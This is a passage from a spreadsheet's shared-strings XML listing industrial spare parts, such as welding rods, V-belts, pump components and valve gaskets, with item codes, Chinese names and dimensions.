  </si>
  <si>
    <t>ZCNU203</t>
  </si>
  <si>
    <t>NU203</t>
  </si>
  <si>
    <t>07080665-3</t>
  </si>
  <si>
    <t>JKZC6203</t>
  </si>
  <si>
    <t>6203</t>
  </si>
  <si>
    <t>07080674</t>
  </si>
  <si>
    <t>ZC6026</t>
  </si>
  <si>
    <t>6026</t>
  </si>
  <si>
    <t>07080675</t>
  </si>
  <si>
    <t>ZC32014</t>
  </si>
  <si>
    <t>32014</t>
  </si>
  <si>
    <t>07080676</t>
  </si>
  <si>
    <t>ZC4922</t>
  </si>
  <si>
    <t>4922</t>
  </si>
  <si>
    <t>07080679</t>
  </si>
  <si>
    <t>JKZCNU2326</t>
  </si>
  <si>
    <t>NU2326</t>
  </si>
  <si>
    <t>07080690</t>
  </si>
  <si>
    <t>ZC6416</t>
  </si>
  <si>
    <t>6416</t>
  </si>
  <si>
    <t>07080691</t>
  </si>
  <si>
    <t>ZC588909</t>
  </si>
  <si>
    <t>588909</t>
  </si>
  <si>
    <t>07080697</t>
  </si>
  <si>
    <t>ZC2007114E</t>
  </si>
  <si>
    <t>2007114E</t>
  </si>
  <si>
    <t>07090104</t>
  </si>
  <si>
    <t>HT5</t>
  </si>
  <si>
    <t>焊条</t>
  </si>
  <si>
    <t>5</t>
  </si>
  <si>
    <t>07090106</t>
  </si>
  <si>
    <t>HT506</t>
  </si>
  <si>
    <t>506</t>
  </si>
  <si>
    <t>07090114</t>
  </si>
  <si>
    <t>HXT</t>
  </si>
  <si>
    <t>焊锡条</t>
  </si>
  <si>
    <t>07090115</t>
  </si>
  <si>
    <t>碳棒</t>
  </si>
  <si>
    <t>07100709</t>
  </si>
  <si>
    <t>07100713</t>
  </si>
  <si>
    <t>KGQ</t>
  </si>
  <si>
    <t>扩管器</t>
  </si>
  <si>
    <t>07100732</t>
  </si>
  <si>
    <t>07100748</t>
  </si>
  <si>
    <t>锯条</t>
  </si>
  <si>
    <t>07100754</t>
  </si>
  <si>
    <t>GSSQZ</t>
  </si>
  <si>
    <t>钢丝绳卡子</t>
  </si>
  <si>
    <t>07100755</t>
  </si>
  <si>
    <t>FBQDJ</t>
  </si>
  <si>
    <t>分布器电极</t>
  </si>
  <si>
    <t>07100759</t>
  </si>
  <si>
    <t>YBY</t>
  </si>
  <si>
    <t>圆板牙</t>
  </si>
  <si>
    <t>07100759-1</t>
  </si>
  <si>
    <t>BY20</t>
  </si>
  <si>
    <t>板牙</t>
  </si>
  <si>
    <t>07100764</t>
  </si>
  <si>
    <t>CJZT</t>
  </si>
  <si>
    <t>冲击钻头</t>
  </si>
  <si>
    <t>07100796</t>
  </si>
  <si>
    <t>07100798</t>
  </si>
  <si>
    <t>ZSTJ</t>
  </si>
  <si>
    <t>注射筒胶</t>
  </si>
  <si>
    <t>07100804</t>
  </si>
  <si>
    <t>KH</t>
  </si>
  <si>
    <t>07100816</t>
  </si>
  <si>
    <t>MAK</t>
  </si>
  <si>
    <t>马鞍卡</t>
  </si>
  <si>
    <t>07110201</t>
  </si>
  <si>
    <t>SJD</t>
  </si>
  <si>
    <t>三角带</t>
  </si>
  <si>
    <t>07110202</t>
  </si>
  <si>
    <t>SJD3V800</t>
  </si>
  <si>
    <t>3V800</t>
  </si>
  <si>
    <t>07110204</t>
  </si>
  <si>
    <t>SJD1200-1400</t>
  </si>
  <si>
    <t>1200-1400</t>
  </si>
  <si>
    <t>07110206</t>
  </si>
  <si>
    <t>SJD1600-1800</t>
  </si>
  <si>
    <t>1600-1800</t>
  </si>
  <si>
    <t>07110207</t>
  </si>
  <si>
    <t>SJD1800-2000</t>
  </si>
  <si>
    <t>1800-2000</t>
  </si>
  <si>
    <t>07110208</t>
  </si>
  <si>
    <t>SJDB2000</t>
  </si>
  <si>
    <t>A2000</t>
  </si>
  <si>
    <t>07110209</t>
  </si>
  <si>
    <t>SJD2300-2500</t>
  </si>
  <si>
    <t>2300-2500</t>
  </si>
  <si>
    <t>07110210</t>
  </si>
  <si>
    <t>SJD2500-2800</t>
  </si>
  <si>
    <t>2500-2800</t>
  </si>
  <si>
    <t>07110212</t>
  </si>
  <si>
    <t>SJD3000-3200</t>
  </si>
  <si>
    <t>3000-3200</t>
  </si>
  <si>
    <t>07110216</t>
  </si>
  <si>
    <t>SJD4200-4500</t>
  </si>
  <si>
    <t>4200-4500</t>
  </si>
  <si>
    <t>07110217</t>
  </si>
  <si>
    <t>SJD5004</t>
  </si>
  <si>
    <t>D5004</t>
  </si>
  <si>
    <t>07110218</t>
  </si>
  <si>
    <t>SJDE7112</t>
  </si>
  <si>
    <t>E7112</t>
  </si>
  <si>
    <t>07110219</t>
  </si>
  <si>
    <t>E8000</t>
  </si>
  <si>
    <t>07110220</t>
  </si>
  <si>
    <t>8PK</t>
  </si>
  <si>
    <t>07110221</t>
  </si>
  <si>
    <t>CXD</t>
  </si>
  <si>
    <t>齿形带</t>
  </si>
  <si>
    <t>07122707</t>
  </si>
  <si>
    <t>70KGMHQ干粉</t>
  </si>
  <si>
    <t>70KG灭火器</t>
  </si>
  <si>
    <t>干粉</t>
  </si>
  <si>
    <t>具</t>
  </si>
  <si>
    <t>07131375</t>
  </si>
  <si>
    <t>GSZ</t>
  </si>
  <si>
    <t>高速轴</t>
  </si>
  <si>
    <t>ZDY355</t>
  </si>
  <si>
    <t>07141345-8</t>
  </si>
  <si>
    <t>MFQ250</t>
  </si>
  <si>
    <t>07141367</t>
  </si>
  <si>
    <t>YSFLQBFC-3000</t>
  </si>
  <si>
    <t>BFC-3000</t>
  </si>
  <si>
    <t>07141368</t>
  </si>
  <si>
    <t>DCLZDY280-5-1</t>
  </si>
  <si>
    <t>大齿轮</t>
  </si>
  <si>
    <t>ZDY280-5-1</t>
  </si>
  <si>
    <t>07141374</t>
  </si>
  <si>
    <t>07150303</t>
  </si>
  <si>
    <t>JLRG造粒机</t>
  </si>
  <si>
    <t>进粒软管</t>
  </si>
  <si>
    <t>07150304</t>
  </si>
  <si>
    <t>DSC</t>
  </si>
  <si>
    <t>大伞齿</t>
  </si>
  <si>
    <t>07150305</t>
  </si>
  <si>
    <t>XSC</t>
  </si>
  <si>
    <t>小伞齿</t>
  </si>
  <si>
    <t>07150307</t>
  </si>
  <si>
    <t>07160501</t>
  </si>
  <si>
    <t>07160601</t>
  </si>
  <si>
    <t>ZDL脱碳旧泵</t>
  </si>
  <si>
    <t>中导轮</t>
  </si>
  <si>
    <t>脱碳旧泵</t>
  </si>
  <si>
    <t>07160602</t>
  </si>
  <si>
    <t>PHP200D43*5</t>
  </si>
  <si>
    <t>200D43*5</t>
  </si>
  <si>
    <t>07160603</t>
  </si>
  <si>
    <t>PHT200D43*5</t>
  </si>
  <si>
    <t>07160604</t>
  </si>
  <si>
    <t>TLYG200D43*5</t>
  </si>
  <si>
    <t>07160605</t>
  </si>
  <si>
    <t>SKH200D43*5</t>
  </si>
  <si>
    <t>首口环</t>
  </si>
  <si>
    <t>07160606</t>
  </si>
  <si>
    <t>ZKH200D43*5</t>
  </si>
  <si>
    <t>中口环</t>
  </si>
  <si>
    <t>07160608</t>
  </si>
  <si>
    <t>YLM200D43*5</t>
  </si>
  <si>
    <t>07160609</t>
  </si>
  <si>
    <t>JXMF贫液泵</t>
  </si>
  <si>
    <t>07160610</t>
  </si>
  <si>
    <t>PHT200D43*2</t>
  </si>
  <si>
    <t>200D43*2</t>
  </si>
  <si>
    <t>07160611</t>
  </si>
  <si>
    <t>PHH200D43*2</t>
  </si>
  <si>
    <t>07160612</t>
  </si>
  <si>
    <t>PHPCH200D43*2</t>
  </si>
  <si>
    <t>平衡盘衬环</t>
  </si>
  <si>
    <t>07160613</t>
  </si>
  <si>
    <t>ZTJ200D43*2</t>
  </si>
  <si>
    <t>轴套甲</t>
  </si>
  <si>
    <t>07160614</t>
  </si>
  <si>
    <t>ZTY200D43*2</t>
  </si>
  <si>
    <t>轴套乙</t>
  </si>
  <si>
    <t>07160615</t>
  </si>
  <si>
    <t>CJYL200D43*2</t>
  </si>
  <si>
    <t>07160616</t>
  </si>
  <si>
    <t>MFHB2104-66-170</t>
  </si>
  <si>
    <t>B2104-66-170</t>
  </si>
  <si>
    <t>07160617</t>
  </si>
  <si>
    <t>MFHB2104-66-190</t>
  </si>
  <si>
    <t>B2104-66-190</t>
  </si>
  <si>
    <t>07160619</t>
  </si>
  <si>
    <t>PHP200D43*2</t>
  </si>
  <si>
    <t>07160620</t>
  </si>
  <si>
    <t>DYT200D43*2</t>
  </si>
  <si>
    <t>07160621</t>
  </si>
  <si>
    <t>ZCZB2104-66-75-1</t>
  </si>
  <si>
    <t>B2104-66-75-1</t>
  </si>
  <si>
    <t>07160623</t>
  </si>
  <si>
    <t>Z200D65*9</t>
  </si>
  <si>
    <t>200D65*9</t>
  </si>
  <si>
    <t>07160624</t>
  </si>
  <si>
    <t>PHB200D65*9</t>
  </si>
  <si>
    <t>平衡板</t>
  </si>
  <si>
    <t>07160625</t>
  </si>
  <si>
    <t>MFH200D65*9</t>
  </si>
  <si>
    <t>07160626</t>
  </si>
  <si>
    <t>PHP200D65*9</t>
  </si>
  <si>
    <t>07160628</t>
  </si>
  <si>
    <t>YL200D65*9-103</t>
  </si>
  <si>
    <t>200D65*9-103</t>
  </si>
  <si>
    <t>07160629</t>
  </si>
  <si>
    <t>ZT200D65*9-104</t>
  </si>
  <si>
    <t>200D65*9-104</t>
  </si>
  <si>
    <t>07160630</t>
  </si>
  <si>
    <t>LZQB2104-66-100</t>
  </si>
  <si>
    <t>B2104-66-100</t>
  </si>
  <si>
    <t>07160632</t>
  </si>
  <si>
    <t>BLM200D43*2</t>
  </si>
  <si>
    <t>扁螺母</t>
  </si>
  <si>
    <t>07160633</t>
  </si>
  <si>
    <t>BDLQSB1101-16-65-5</t>
  </si>
  <si>
    <t>SB1101-16-65-5</t>
  </si>
  <si>
    <t>07160634</t>
  </si>
  <si>
    <t>ZD200D43*5</t>
  </si>
  <si>
    <t>07160635</t>
  </si>
  <si>
    <t>DSQ200D65*9</t>
  </si>
  <si>
    <t>挡水圏</t>
  </si>
  <si>
    <t>07160636</t>
  </si>
  <si>
    <t>ZCJ200D43*5</t>
  </si>
  <si>
    <t>轴承架</t>
  </si>
  <si>
    <t>07160637</t>
  </si>
  <si>
    <t>WG200D43*5</t>
  </si>
  <si>
    <t>尾盖</t>
  </si>
  <si>
    <t>07160701</t>
  </si>
  <si>
    <t>BJ40F-40</t>
  </si>
  <si>
    <t>泵介</t>
  </si>
  <si>
    <t>40F-40</t>
  </si>
  <si>
    <t>07160702</t>
  </si>
  <si>
    <t>Z40F-40</t>
  </si>
  <si>
    <t>07160704</t>
  </si>
  <si>
    <t>MFH40F-40</t>
  </si>
  <si>
    <t>07160705</t>
  </si>
  <si>
    <t>YL40F-40</t>
  </si>
  <si>
    <t>07160706</t>
  </si>
  <si>
    <t>ZT40F-40</t>
  </si>
  <si>
    <t>07160720</t>
  </si>
  <si>
    <t>YLLM50F-40</t>
  </si>
  <si>
    <t>叶轮螺母</t>
  </si>
  <si>
    <t>07160721</t>
  </si>
  <si>
    <t>KH50F-40</t>
  </si>
  <si>
    <t>07160722</t>
  </si>
  <si>
    <t>BDLQ50F-40</t>
  </si>
  <si>
    <t>07160724</t>
  </si>
  <si>
    <t>YL50F-40</t>
  </si>
  <si>
    <t>07160725</t>
  </si>
  <si>
    <t>BJ50F-40</t>
  </si>
  <si>
    <t>07160730</t>
  </si>
  <si>
    <t>LZQ50F-40</t>
  </si>
  <si>
    <t>07161002</t>
  </si>
  <si>
    <t>BGIH65-40-250</t>
  </si>
  <si>
    <t>07161006</t>
  </si>
  <si>
    <t>YLIH65-40-250</t>
  </si>
  <si>
    <t>07161735</t>
  </si>
  <si>
    <t>YJH一甲泵</t>
  </si>
  <si>
    <t>压紧环</t>
  </si>
  <si>
    <t>07161905</t>
  </si>
  <si>
    <t>LGLM液氨泵</t>
  </si>
  <si>
    <t>07161906</t>
  </si>
  <si>
    <t>LGLS液氨泵</t>
  </si>
  <si>
    <t>07161932</t>
  </si>
  <si>
    <t>DG液氨泵</t>
  </si>
  <si>
    <t>07161941</t>
  </si>
  <si>
    <t>SFD液氨泵</t>
  </si>
  <si>
    <t>07162002</t>
  </si>
  <si>
    <t>FT冲洗水泵</t>
  </si>
  <si>
    <t>07162003</t>
  </si>
  <si>
    <t>TH3DZY-1-03-3</t>
  </si>
  <si>
    <t>3DZY-1-03-3</t>
  </si>
  <si>
    <t>07162006</t>
  </si>
  <si>
    <t>TH冲洗水泵</t>
  </si>
  <si>
    <t>07162008</t>
  </si>
  <si>
    <t>F冲洗水泵</t>
  </si>
  <si>
    <t>07162009</t>
  </si>
  <si>
    <t>ZW冲洗水泵</t>
  </si>
  <si>
    <t>07162010</t>
  </si>
  <si>
    <t>CD冲洗水泵</t>
  </si>
  <si>
    <t>衬垫</t>
  </si>
  <si>
    <t>07162011</t>
  </si>
  <si>
    <t>SZTX冲洗水泵</t>
  </si>
  <si>
    <t>07162022</t>
  </si>
  <si>
    <t>FZ3DZY-1-02-1</t>
  </si>
  <si>
    <t>3DZY-1-02-1</t>
  </si>
  <si>
    <t>07162023</t>
  </si>
  <si>
    <t>FZ冲洗水泵</t>
  </si>
  <si>
    <t>07162107</t>
  </si>
  <si>
    <t>ZX减速机</t>
  </si>
  <si>
    <t>07162116</t>
  </si>
  <si>
    <t>DQL1L15-1-39</t>
  </si>
  <si>
    <t>L1L15-1-39</t>
  </si>
  <si>
    <t>07162117</t>
  </si>
  <si>
    <t>DQ减速机</t>
  </si>
  <si>
    <t>07162503</t>
  </si>
  <si>
    <t>TH二甲泵</t>
  </si>
  <si>
    <t>07162504</t>
  </si>
  <si>
    <t>FD二甲泵</t>
  </si>
  <si>
    <t>阀垫</t>
  </si>
  <si>
    <t>07162510</t>
  </si>
  <si>
    <t>MFD二甲泵</t>
  </si>
  <si>
    <t>07162514</t>
  </si>
  <si>
    <t>LZQ二甲泵</t>
  </si>
  <si>
    <t>07162704</t>
  </si>
  <si>
    <t>铅封</t>
  </si>
  <si>
    <t>07162709</t>
  </si>
  <si>
    <t>YLCB50-40-150</t>
  </si>
  <si>
    <t>CB50-40-150</t>
  </si>
  <si>
    <t>07162710</t>
  </si>
  <si>
    <t>BZCB50-40-150</t>
  </si>
  <si>
    <t>07162711</t>
  </si>
  <si>
    <t>LMCB50-40-150</t>
  </si>
  <si>
    <t>080101001</t>
  </si>
  <si>
    <t>HMD269*250*2</t>
  </si>
  <si>
    <t>265*250*4.5</t>
  </si>
  <si>
    <t>080101003</t>
  </si>
  <si>
    <t>HMD329*361*4</t>
  </si>
  <si>
    <t>480*430*2.5</t>
  </si>
  <si>
    <t>080101005</t>
  </si>
  <si>
    <t>HMD138.8*132.2*3</t>
  </si>
  <si>
    <t>活门垫</t>
  </si>
  <si>
    <t>138.8*132.2*3</t>
  </si>
  <si>
    <t>080101006</t>
  </si>
  <si>
    <t>HMD150*140*2</t>
  </si>
  <si>
    <t>080101007</t>
  </si>
  <si>
    <t>HMD170*150*1.5</t>
  </si>
  <si>
    <t>170*157*2</t>
  </si>
  <si>
    <t>080101008</t>
  </si>
  <si>
    <t>080101009</t>
  </si>
  <si>
    <t>HMD218*166*0.7</t>
  </si>
  <si>
    <t>218*208*3.5</t>
  </si>
  <si>
    <t>080101015</t>
  </si>
  <si>
    <t>HMD300*285*1</t>
  </si>
  <si>
    <t>445*415*4.5</t>
  </si>
  <si>
    <t>080101018</t>
  </si>
  <si>
    <t>HMD255*240*1</t>
  </si>
  <si>
    <t>255*240*1</t>
  </si>
  <si>
    <t>080101019</t>
  </si>
  <si>
    <t>HMD180*170*2</t>
  </si>
  <si>
    <t>180*170*2</t>
  </si>
  <si>
    <t>080101020</t>
  </si>
  <si>
    <t>HMD155*145*3</t>
  </si>
  <si>
    <t>155*145*3</t>
  </si>
  <si>
    <t>080101021</t>
  </si>
  <si>
    <t>315*295*1.5</t>
  </si>
  <si>
    <t>080101022</t>
  </si>
  <si>
    <t>HMD185*175*3</t>
  </si>
  <si>
    <t>185*175*3</t>
  </si>
  <si>
    <t>080101024</t>
  </si>
  <si>
    <t>HMD278*262.5*1.5</t>
  </si>
  <si>
    <t>275*260*2.5</t>
  </si>
  <si>
    <t>080101025</t>
  </si>
  <si>
    <t>HMD244.5*230.5*1.5</t>
  </si>
  <si>
    <t>244.5*230.5*1.5</t>
  </si>
  <si>
    <t>080101027</t>
  </si>
  <si>
    <t>HMD145*135*1.5</t>
  </si>
  <si>
    <t>145*135*1.5</t>
  </si>
  <si>
    <t>080101028</t>
  </si>
  <si>
    <t>HMD109.5*100*1.5</t>
  </si>
  <si>
    <t>109.5*100*1.5</t>
  </si>
  <si>
    <t>080101029</t>
  </si>
  <si>
    <t>HMD500-800</t>
  </si>
  <si>
    <t>080101030</t>
  </si>
  <si>
    <t>HMD165*150*5</t>
  </si>
  <si>
    <t>165*150*5</t>
  </si>
  <si>
    <t>080101032</t>
  </si>
  <si>
    <t>HMD202*190*5</t>
  </si>
  <si>
    <t>202*190*5</t>
  </si>
  <si>
    <t>080101033</t>
  </si>
  <si>
    <t>HMD34*25*1</t>
  </si>
  <si>
    <t>34*25*1</t>
  </si>
  <si>
    <t>080101034</t>
  </si>
  <si>
    <t>HMD42*</t>
  </si>
  <si>
    <t>42*</t>
  </si>
  <si>
    <t>080101035</t>
  </si>
  <si>
    <t>HMD50*38*2</t>
  </si>
  <si>
    <t>48*39*2.5</t>
  </si>
  <si>
    <t>080101036</t>
  </si>
  <si>
    <t>HMD75*53*2</t>
  </si>
  <si>
    <t>70*50*2</t>
  </si>
  <si>
    <t>080101037</t>
  </si>
  <si>
    <t>HMD249*24*1</t>
  </si>
  <si>
    <t>249*24*1</t>
  </si>
  <si>
    <t>080101040</t>
  </si>
  <si>
    <t>HMD24*17*1</t>
  </si>
  <si>
    <t>24*17*1</t>
  </si>
  <si>
    <t>080101041</t>
  </si>
  <si>
    <t>HMD120*75*1.5</t>
  </si>
  <si>
    <t>120*75*1.5</t>
  </si>
  <si>
    <t>080101042</t>
  </si>
  <si>
    <t>HMD203*159*2.5</t>
  </si>
  <si>
    <t>203*159*2.5</t>
  </si>
  <si>
    <t>080101043</t>
  </si>
  <si>
    <t>HMD25*21*1</t>
  </si>
  <si>
    <t>25*21*1</t>
  </si>
  <si>
    <t>080101044</t>
  </si>
  <si>
    <t>HMD201*193*2</t>
  </si>
  <si>
    <t>201*193*2</t>
  </si>
  <si>
    <t>080101045</t>
  </si>
  <si>
    <t>HMD229*221*2</t>
  </si>
  <si>
    <t>229*221*2</t>
  </si>
  <si>
    <t>080101046</t>
  </si>
  <si>
    <t>HMD14*6*1</t>
  </si>
  <si>
    <t>16*9*1</t>
  </si>
  <si>
    <t>080101048</t>
  </si>
  <si>
    <t>HMD299*</t>
  </si>
  <si>
    <t>274*207*3</t>
  </si>
  <si>
    <t>080101049</t>
  </si>
  <si>
    <t>HMD104*78*12</t>
  </si>
  <si>
    <t>104*78*12</t>
  </si>
  <si>
    <t>080101050</t>
  </si>
  <si>
    <t>HMD40*25*1</t>
  </si>
  <si>
    <t>40*25*1</t>
  </si>
  <si>
    <t>080101051</t>
  </si>
  <si>
    <t>HMD186.5*175*2</t>
  </si>
  <si>
    <t>186.5*175*2</t>
  </si>
  <si>
    <t>080101052</t>
  </si>
  <si>
    <t>HMD164.5*155*2</t>
  </si>
  <si>
    <t>164.5*155*2</t>
  </si>
  <si>
    <t>080101054</t>
  </si>
  <si>
    <t>HMD154.5*135*2</t>
  </si>
  <si>
    <t>154.5*135*2</t>
  </si>
  <si>
    <t>080101055</t>
  </si>
  <si>
    <t>HMD126*115*2</t>
  </si>
  <si>
    <t>125*115*2</t>
  </si>
  <si>
    <t>080101057</t>
  </si>
  <si>
    <t>HMD155*140*2</t>
  </si>
  <si>
    <t>155*140*2</t>
  </si>
  <si>
    <t>080101058</t>
  </si>
  <si>
    <t>HMD185*170*2</t>
  </si>
  <si>
    <t>185*170*2</t>
  </si>
  <si>
    <t>080101059</t>
  </si>
  <si>
    <t>HMD174*160*2</t>
  </si>
  <si>
    <t>174*160*2</t>
  </si>
  <si>
    <t>080101060</t>
  </si>
  <si>
    <t>HMD285*270*2</t>
  </si>
  <si>
    <t>285*270*2</t>
  </si>
  <si>
    <t>080101061</t>
  </si>
  <si>
    <t>HMD244*230.5*2</t>
  </si>
  <si>
    <t>080101062</t>
  </si>
  <si>
    <t>HMD204.5*195.5*2</t>
  </si>
  <si>
    <t>204.5*195.5*2</t>
  </si>
  <si>
    <t>080101063</t>
  </si>
  <si>
    <t>HMD234*220.5*2</t>
  </si>
  <si>
    <t>235*200*2.5</t>
  </si>
  <si>
    <t>080101064</t>
  </si>
  <si>
    <t>HMD141.5*130.5*2</t>
  </si>
  <si>
    <t>141.5*130.5*2</t>
  </si>
  <si>
    <t>080101066</t>
  </si>
  <si>
    <t>080101069</t>
  </si>
  <si>
    <t>HMD????</t>
  </si>
  <si>
    <t>铜垫</t>
  </si>
  <si>
    <t>铜质</t>
  </si>
  <si>
    <t>080101070</t>
  </si>
  <si>
    <t>HMD350</t>
  </si>
  <si>
    <t>350*335*2</t>
  </si>
  <si>
    <t>080101071</t>
  </si>
  <si>
    <t>HMD24*19*1</t>
  </si>
  <si>
    <t>24*19*1</t>
  </si>
  <si>
    <t>080101073</t>
  </si>
  <si>
    <t>HMD22*17*1</t>
  </si>
  <si>
    <t>22*16*2</t>
  </si>
  <si>
    <t>080101074</t>
  </si>
  <si>
    <t>HMD310*298*1.5</t>
  </si>
  <si>
    <t>308*290*1.5</t>
  </si>
  <si>
    <t>080101076</t>
  </si>
  <si>
    <t>HMD315*295*2</t>
  </si>
  <si>
    <t>315*295*2</t>
  </si>
  <si>
    <t>080101077</t>
  </si>
  <si>
    <t>HMD269.5*256*1.5</t>
  </si>
  <si>
    <t>269.5*256*1.5</t>
  </si>
  <si>
    <t>080101078</t>
  </si>
  <si>
    <t>HMD115*105*2</t>
  </si>
  <si>
    <t>115*105*2</t>
  </si>
  <si>
    <t>080101081</t>
  </si>
  <si>
    <t>HMD164*152.5*2</t>
  </si>
  <si>
    <t>164*152.5*2</t>
  </si>
  <si>
    <t>080101082</t>
  </si>
  <si>
    <t>HMD184.5*270.5*1.5</t>
  </si>
  <si>
    <t>184.5*270.5*1.5</t>
  </si>
  <si>
    <t>080101083</t>
  </si>
  <si>
    <t>HMD189.5*180*1.5</t>
  </si>
  <si>
    <t>189.5*180*1.5</t>
  </si>
  <si>
    <t>080101087</t>
  </si>
  <si>
    <t>HMD228*216*2</t>
  </si>
  <si>
    <t>228*216*2</t>
  </si>
  <si>
    <t>080101088</t>
  </si>
  <si>
    <t>HMD180*165*2</t>
  </si>
  <si>
    <t>180*165*2</t>
  </si>
  <si>
    <t>080101089</t>
  </si>
  <si>
    <t>HMD132.5*115*5.5</t>
  </si>
  <si>
    <t>131*115*5.5</t>
  </si>
  <si>
    <t>080101092</t>
  </si>
  <si>
    <t>HMD35*27*11</t>
  </si>
  <si>
    <t>35*27*11</t>
  </si>
  <si>
    <t>080101094</t>
  </si>
  <si>
    <t>HMD10*6</t>
  </si>
  <si>
    <t>10*6</t>
  </si>
  <si>
    <t>080101095</t>
  </si>
  <si>
    <t>HMD120*105*2</t>
  </si>
  <si>
    <t>120*105*2</t>
  </si>
  <si>
    <t>080101097</t>
  </si>
  <si>
    <t>HMD</t>
  </si>
  <si>
    <t>126*113*3</t>
  </si>
  <si>
    <t>080101098</t>
  </si>
  <si>
    <t>HMD110*100*2</t>
  </si>
  <si>
    <t>110*100*2</t>
  </si>
  <si>
    <t>080101099</t>
  </si>
  <si>
    <t>HMD1000-1200-1205</t>
  </si>
  <si>
    <t>947*905*2.5</t>
  </si>
  <si>
    <t>080101100</t>
  </si>
  <si>
    <t>HMD86*71*13</t>
  </si>
  <si>
    <t>86*71*13</t>
  </si>
  <si>
    <t>080101101</t>
  </si>
  <si>
    <t>HMD134*126*1.5</t>
  </si>
  <si>
    <t>134*126*1.5</t>
  </si>
  <si>
    <t>080202026</t>
  </si>
  <si>
    <t>HSH168.21-00</t>
  </si>
  <si>
    <t>168.21-00</t>
  </si>
  <si>
    <t>080202027</t>
  </si>
  <si>
    <t>HSH168.22-01</t>
  </si>
  <si>
    <t>168.22-01</t>
  </si>
  <si>
    <t>080202029</t>
  </si>
  <si>
    <t>DXH</t>
  </si>
  <si>
    <t>五六段导向环</t>
  </si>
  <si>
    <t>16机钢165*145*65</t>
  </si>
  <si>
    <t>080202060</t>
  </si>
  <si>
    <t>ZW168.01-14</t>
  </si>
  <si>
    <t>168.01-14</t>
  </si>
  <si>
    <t>080202061</t>
  </si>
  <si>
    <t>ZW168.01-25</t>
  </si>
  <si>
    <t>168.01-25</t>
  </si>
  <si>
    <t>080202062</t>
  </si>
  <si>
    <t>ZW168.03-03</t>
  </si>
  <si>
    <t>168.03-03</t>
  </si>
  <si>
    <t>080202063</t>
  </si>
  <si>
    <t>ZW168.01-21</t>
  </si>
  <si>
    <t>168.01-21</t>
  </si>
  <si>
    <t>080202076</t>
  </si>
  <si>
    <t>GYH168.38-05</t>
  </si>
  <si>
    <t>168.38-05</t>
  </si>
  <si>
    <t>080202077</t>
  </si>
  <si>
    <t>GYH168.38-06</t>
  </si>
  <si>
    <t>168.38-06</t>
  </si>
  <si>
    <t>080202085</t>
  </si>
  <si>
    <t>注油泵</t>
  </si>
  <si>
    <t>080202090</t>
  </si>
  <si>
    <t>WT168.03-01</t>
  </si>
  <si>
    <t>小头瓦（铜套）</t>
  </si>
  <si>
    <t>168.03-01</t>
  </si>
  <si>
    <t>080203019</t>
  </si>
  <si>
    <t>FT169.cy3500</t>
  </si>
  <si>
    <t>阀头</t>
  </si>
  <si>
    <t>169.cy3500</t>
  </si>
  <si>
    <t>080203027</t>
  </si>
  <si>
    <t>168.42-01</t>
  </si>
  <si>
    <t>080203033</t>
  </si>
  <si>
    <t>YG168.04-10</t>
  </si>
  <si>
    <t>168.04-10</t>
  </si>
  <si>
    <t>080203041</t>
  </si>
  <si>
    <t>ZYGL380</t>
  </si>
  <si>
    <t>注油管</t>
  </si>
  <si>
    <t>L380</t>
  </si>
  <si>
    <t>080203042</t>
  </si>
  <si>
    <t>ZYGL360</t>
  </si>
  <si>
    <t>L360</t>
  </si>
  <si>
    <t>080203063</t>
  </si>
  <si>
    <t>QZ168.02-01a</t>
  </si>
  <si>
    <t>168.02-01a</t>
  </si>
  <si>
    <t>080203070</t>
  </si>
  <si>
    <t>UXG168.84-03</t>
  </si>
  <si>
    <t>U形管</t>
  </si>
  <si>
    <t>168.84-03</t>
  </si>
  <si>
    <t>080203086</t>
  </si>
  <si>
    <t>LJG4M16c15-04</t>
  </si>
  <si>
    <t>连接管</t>
  </si>
  <si>
    <t>4M16c15-04</t>
  </si>
  <si>
    <t>080204010</t>
  </si>
  <si>
    <t>OXQ170.1.9</t>
  </si>
  <si>
    <t>170.1.9</t>
  </si>
  <si>
    <t>080204016</t>
  </si>
  <si>
    <t>OXQ190*5.7</t>
  </si>
  <si>
    <t>190*5.7</t>
  </si>
  <si>
    <t>080204025</t>
  </si>
  <si>
    <t>ZLH*36-06</t>
  </si>
  <si>
    <t>阻流环*</t>
  </si>
  <si>
    <t>36-06</t>
  </si>
  <si>
    <t>080204026</t>
  </si>
  <si>
    <t>JLH33-03</t>
  </si>
  <si>
    <t>节流环*</t>
  </si>
  <si>
    <t>33-03</t>
  </si>
  <si>
    <t>080204027</t>
  </si>
  <si>
    <t>ZLH33-08</t>
  </si>
  <si>
    <t>33-08</t>
  </si>
  <si>
    <t>080204030</t>
  </si>
  <si>
    <t>TJDF6-76</t>
  </si>
  <si>
    <t>F6-76</t>
  </si>
  <si>
    <t>080204031</t>
  </si>
  <si>
    <t>HSH25-01</t>
  </si>
  <si>
    <t>25-01a 165*13*9</t>
  </si>
  <si>
    <t>080204032</t>
  </si>
  <si>
    <t>HSH23-06</t>
  </si>
  <si>
    <t>23-06</t>
  </si>
  <si>
    <t>080204033</t>
  </si>
  <si>
    <t>HSH23-03 Φ220</t>
  </si>
  <si>
    <t>23-03 Φ220</t>
  </si>
  <si>
    <t>080204036</t>
  </si>
  <si>
    <t>ZCH23-07</t>
  </si>
  <si>
    <t>23-07</t>
  </si>
  <si>
    <t>080204037</t>
  </si>
  <si>
    <t>TLZJ33-00</t>
  </si>
  <si>
    <t>填料部件</t>
  </si>
  <si>
    <t>33-00</t>
  </si>
  <si>
    <t>080204040</t>
  </si>
  <si>
    <t>YZHFYS 862-88-00</t>
  </si>
  <si>
    <t>油止回阀</t>
  </si>
  <si>
    <t>YS 862-88-00</t>
  </si>
  <si>
    <t>080204042</t>
  </si>
  <si>
    <t>XL66YS 403-01-88</t>
  </si>
  <si>
    <t>L66YS 403-01-88</t>
  </si>
  <si>
    <t>080204043</t>
  </si>
  <si>
    <t>TYS 402-88</t>
  </si>
  <si>
    <t>YS 402-88</t>
  </si>
  <si>
    <t>080204044</t>
  </si>
  <si>
    <t>YB03-88</t>
  </si>
  <si>
    <t>压板</t>
  </si>
  <si>
    <t>03-88</t>
  </si>
  <si>
    <t>080204045</t>
  </si>
  <si>
    <t>QMGTYS 980-88</t>
  </si>
  <si>
    <t>球面管套</t>
  </si>
  <si>
    <t>YS 980-88</t>
  </si>
  <si>
    <t>080204048</t>
  </si>
  <si>
    <t>LJM12*1.5</t>
  </si>
  <si>
    <t>连接母</t>
  </si>
  <si>
    <t>12*1.5</t>
  </si>
  <si>
    <t>080204053</t>
  </si>
  <si>
    <t>DJT15-04</t>
  </si>
  <si>
    <t>大接头</t>
  </si>
  <si>
    <t>15-04</t>
  </si>
  <si>
    <t>080204055</t>
  </si>
  <si>
